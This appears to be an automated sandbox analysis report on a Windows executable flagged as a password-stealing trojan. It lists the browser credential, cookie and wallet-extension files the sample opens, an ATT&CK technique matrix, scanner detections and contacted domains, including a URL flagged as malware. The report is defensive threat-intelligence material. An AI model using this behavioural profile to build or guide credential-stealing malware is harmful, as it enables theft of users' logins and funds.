Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeQueries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF7012889E0 cpuid 0_2_00007FF7012889E0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF70126B5B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF70126B5B0
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeCode function: 0_2_00007FF701284E50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF701284E50

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
11
Process Injection
1
OS Credential Dumping
2
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium11
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory21
Security Software Discovery
Remote Desktop Protocol1
Data from Local System
Exfiltration Over Bluetooth1
Ingress Tool Transfer
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
Non-Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Timestomp
NTDS1
System Network Configuration Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer14
Application Layer Protocol
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets1
File and Directory Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials22
System Information Discovery
VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
KzqQe0QtRd.exe42%ReversingLabsWin64.Trojan.Wasp
KzqQe0QtRd.exe21%VirustotalBrowse
KzqQe0QtRd.exe100%AviraTR/PSW.Agent.gdafr
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD4.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD5.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA1.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA224.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA256.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA384.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA512.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_keccak.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_poly1305.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Math\_modexp.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_x25519.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_strxor.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md__mypyc.cp311-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd0%ReversingLabs
No Antivirus matches
SourceDetectionScannerLabelLink
ptb.discord.com0%VirustotalBrowse
geolocation-db.com0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://blog.jaraco.com/skeleton0%URL Reputationsafe
http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
https://wwww.certigna.fr/autorites/0%URL Reputationsafe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
http://www.accv.es000%URL Reputationsafe
https://discord.com)z0%Avira URL Cloudsafe
http://schemas.m0%URL Reputationsafe
http://crl.securetrust.com/SGCA.crl0%URL Reputationsafe
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html0%URL Reputationsafe
https://ebay.com)z$0%Avira URL Cloudsafe
https://xbox.com)0%Avira URL Cloudsafe
https://disney.com)z$0%Avira URL Cloudsafe
https://twitch.com)z0%Avira URL Cloudsafe
https://gmail.com)z0%Avira URL Cloudsafe
http://crl.dhimyotis.com/certignarootca.crlP0%Avira URL Cloudsafe
https://superfurrycdn.nl/copy/100%Avira URL Cloudmalware
https://paypal.com)z0%Avira URL Cloudsafe
https://uber.com)z0%Avira URL Cloudsafe
https://coinbase.com)z0%Avira URL Cloudsafe
https://geolocation-db.com/jsonp/z0%Avira URL Cloudsafe
https://hbo.com)z0%Avira URL Cloudsafe
https://roblox.com)z0%Avira URL Cloudsafe
http://crl.securetrust.com/STCA.crlm0%Avira URL Cloudsafe
https://binance.com)z0%Avira URL Cloudsafe
http://crl.xrampsecurity.com/XGCA.crl%0%Avira URL Cloudsafe
https://twitter.com)z0%Avira URL Cloudsafe
http://crl.xrampsecurity.com/XGCA.crlF20%Avira URL Cloudsafe
https://telegram.com)z0%Avira URL Cloudsafe
https://origin.com)z0%Avira URL Cloudsafe
https://tiktok.com)z0%Avira URL Cloudsafe
https://riotgames.com)z0%Avira URL Cloudsafe
https://playstation.com)z0%Avira URL Cloudsafe
https://pornhub.com)z0%Avira URL Cloudsafe
https://steam.com)z0%Avira URL Cloudsafe
https://mahler:8092/site-updates.py0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
ptb.discord.com
162.159.137.232
truefalseunknown
api4.ipify.org
173.231.16.76
truefalse
    high
    geolocation-db.com
    159.89.102.253
    truefalseunknown
    api.gofile.io
    51.38.43.18
    truefalse
      high
      api.ipify.org
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://github.com/pypa/packagingPKzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmpfalse
          high
          https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdfKzqQe0QtRd.exe, 00000001.00000003.289149538.00000221274B7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275987761.000002212748E000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276055923.00000221274A4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279714208.00000221274B5000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://freezy01.ct8.pl/assets/js/index2.jsz=KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://img.shields.io/badge/skeleton-2022-informationalKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://img.shields.io/pypi/pyversions/setuptools.svgKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://discord.com)zKzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  https://img.shields.io/pypi/v/setuptools.svgKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://ebay.com)z$KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    low
                    http://docs.python.org/library/unittest.htmlKzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292578153.0000022126DAD000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://repository.swisssign.com/7KzqQe0QtRd.exe, 00000001.00000003.274467347.00000221281BD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://tidelift.com/securityKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://tools.ietf.org/html/rfc2388#section-4.4KzqQe0QtRd.exe, 00000001.00000003.275180849.0000022127D72000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274367842.0000022127D72000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279856273.0000022127D72000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64KzqQe0QtRd.exe, 00000001.00000003.277774285.0000022126B65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279424780.0000022126B75000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288232938.0000022126B7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://img.shields.io/codecov/c/github/pypa/setuptools/master.svg?logo=codecov&logoColor=whiteKzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://disney.com)z$KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmpfalse
